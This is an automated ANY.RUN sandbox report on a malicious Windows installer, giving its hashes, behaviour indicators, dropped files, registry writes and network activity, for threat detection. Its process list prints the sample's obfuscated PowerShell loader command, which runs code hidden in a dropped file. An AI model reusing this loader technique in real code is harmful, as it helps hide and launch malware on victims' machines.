File name:

virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe

Full analysis: https://app.any.run/tasks/edf15d6e-00fd-40e9-9aa8-45352c1a0268
Verdict: Malicious activity
Analysis date: May 13, 2025, 02:59:16
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:

6BEA7885776A10DB0440AA9AA54C33E0

SHA1:

FB419387F218407E49C44B43933B85DD4895A87D

SHA256:

31E2B443E9A00A9FB475C92EA51598CB384121B15612386B9F81467F3FCCD49A

SSDEEP:

49152:75SaB2C71kGrV+g1kvE1H9GRzXINs8yMDG+hVViIf947JU/BFTMAdVNhz7bP2UiF:UaB2qOGx+gOvEhERzXSs8LhuIf94dUYr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)

  • SUSPICIOUS

    • There is functionality for taking screenshot (YARA)

      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)

    • Starts POWERSHELL.EXE for commands execution

      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)

  • INFO

    • The sample compiled with english language support

      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)

    • Checks supported languages

      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)

    • Reads the computer name

      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)

    • Create files in a temporary directory

      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7408)

    • Reads the software policy settings

      • slui.exe (PID: 8056)

    • Checks proxy server information

      • slui.exe (PID: 8056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | NSIS - Nullsoft Scriptable Install System (94.8)
.exe | Win32 Executable MS Visual C++ (generic) (3.4)
.dll | Win32 Dynamic Link Library (generic) (0.7)
.exe | Win32 Executable (generic) (0.5)
.exe | Generic Win/DOS Executable (0.2)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2014:10:07 04:39:56+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 23552
InitializedDataSize: 3781632
UninitializedDataSize: 1024
EntryPoint: 0x30c9
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 2.1.0.0
ProductVersionNumber: 2.1.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: rejnfan
FileDescription: tidsprioriteringerne almennyttigt kanawha
InternalName: sobe aarsbudgettet.exe
LegalCopyright: styreprograms
LegalTrademarks: basilikumen zach
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
130
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe no specs powershell.exe no specs conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
7408powershell.exe -windowstyle 1 "$Shoebills=GC -raw 'C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Rustningsdelenes.eks';$Outequivocate=$Shoebills.SubString(54415,3);.$Outequivocate($Shoebills)"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exevirussign.com_6bea7885776a10db0440aa9aa54c33e0.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7464\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7792"C:\Users\admin\Desktop\virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe" C:\Users\admin\Desktop\virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
tidsprioriteringerne almennyttigt kanawha
Modules
Images
c:\users\admin\desktop\virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
8056C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
10 642
Read events
10 640
Write events
2
Delete events
0

Modification events

(PID) Process:(7792) virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeKey:HKEY_CURRENT_USER\galdesygt\Uninstall\opblomstringens
Operation:writeName:charabancers
Value:
1
(PID) Process:(7792) virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeKey:HKEY_CURRENT_USER\Shortcut218\Hjerterfri\Taenidia
Operation:writeName:amine
Value:
%kalamian%\krystalsukker\Reservationsseddel0.htm
Executable files
0
Suspicious files
3
Text files
19
Unknown types
0

Dropped files

PID
Process
Filename
Type
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Multiparae195.wag
MD5:
SHA256:
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\celiadelphus.elv
MD5:
SHA256:
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Rustningsdelenes.ekstext
MD5:0E317475E818EAAF300F175230E3679B
SHA256:4FC778B71F3E4DFBCDC4CA2D9E735D2DEDBE7AED003C6DC152E0E58B5391F878
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\cigars.jpgimage
MD5:DB69AA2DFCA6A07C84A00B7319D5784B
SHA256:C3426E198E0E79C96C2A4F4AE9CCB64B36095EB228D2BBE9C11D1852C612DD2A
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Benzinaftaler.nonbinary
MD5:CE5A4BB6CE42D93D4E28CD40DB6EA8C0
SHA256:E7F8DFC8BDB33AB9D60B4675DCDD499AF079A5D3F450449411022461BA47A38A
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Hygiejne226.txttext
MD5:786B7B9351D9C1E5A1F711F5FD030C4D
SHA256:2791BB99CB704DD8797CFA829905B77B4E8A164823AA13E4AF651F5260CBDC56
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Snowing.Vakbinary
MD5:4D44EEFC8976F0D4F8B11402CEA30AF5
SHA256:74EB651B6A8890984536D520FBB66A0B3A42CC18E8B1F0D07E03F8FAF90932E2
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\kikumon\overentreat.jpgimage
MD5:924BE56BE197155C92C4BA20B937EFAC
SHA256:60F224C38355A11C7332358E68BD64A9488AC858C44500A5F45867BE650B47D7
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\kikumon\hable.initext
MD5:7E1B9E2797B94A8A53CFF36F0F37D003
SHA256:188553762F0BA94F591FB6E71DE6C36673ACD9511F694299C3AACAB200AEFABC
7792virussign.com_6bea7885776a10db0440aa9aa54c33e0.exeC:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\kikumon\trilliaceae.txttext
MD5:3DD1420346F9170694CE0FC9EC15AE4C
SHA256:78069E598836A49E224A4CEE525E018CA7F24CFCA539AB3B8E0E8E34DBDA5A46
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
39
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2656
RUXIMICS.exe
GET
200
23.216.77.30:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7860
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
2656
RUXIMICS.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7860
SIHClient.exe
GET
200
23.216.77.18:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
7860
SIHClient.exe
GET
200
23.216.77.18:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
7860
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7860
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
7860
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
7860
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2656
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
40.126.31.69:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2656
RUXIMICS.exe
23.216.77.30:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2656
RUXIMICS.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
7860
SIHClient.exe
4.175.87.197:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7860
SIHClient.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.78
whitelisted
login.live.com
  • 40.126.31.69
  • 20.190.159.64
  • 40.126.31.71
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.130
  • 20.190.159.71
  • 40.126.31.129
whitelisted
crl.microsoft.com
  • 23.216.77.30
  • 23.216.77.18
  • 23.216.77.22
  • 23.216.77.33
  • 23.216.77.10
  • 23.216.77.25
  • 23.216.77.29
  • 23.216.77.21
  • 23.216.77.23
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
nexusrules.officeapps.live.com
  • 52.111.227.14
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe